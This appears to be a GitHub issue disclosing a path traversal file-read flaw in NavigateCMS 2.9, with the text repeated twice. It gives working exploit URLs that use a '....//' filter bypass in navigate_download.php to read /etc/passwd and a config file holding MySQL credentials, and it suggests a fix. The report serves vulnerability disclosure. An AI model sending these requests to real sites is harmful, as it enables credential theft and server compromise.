after login ,we can see our sid in cookies
for example my sid is 161099c65675803ecc8de95ae08d3e12
then you can get arbitrary file by /navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//....//....//etc/passwd /navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//cfg/globals.php you can get some Sensitive information such as mysql user/password
analysis
location:navigate_download.php
and in navigate\lib\core\core.php
we can rewrite bypass this filter.
suggest
you can use replace('../', "hacker") rather than replace('../', "")
The text was updated successfully, but these errors were encountered:
bkfish
changed the title
arbitrary file read vulnerability
arbitrary file read vulnerability in NavigateCMS 2.9
Nov 25, 2021
exp
after login ,we can see our sid in cookies


for example my sid is 161099c65675803ecc8de95ae08d3e12
then you can get arbitrary file by
/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//....//....//etc/passwd/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//cfg/globals.phpyou can get some Sensitive information such as mysql user/passwordanalysis
location:navigate_download.php


and in navigate\lib\core\core.php
we can rewrite bypass this filter.
suggest
you can use replace('../', "hacker") rather than replace('../', "")
The text was updated successfully, but these errors were encountered: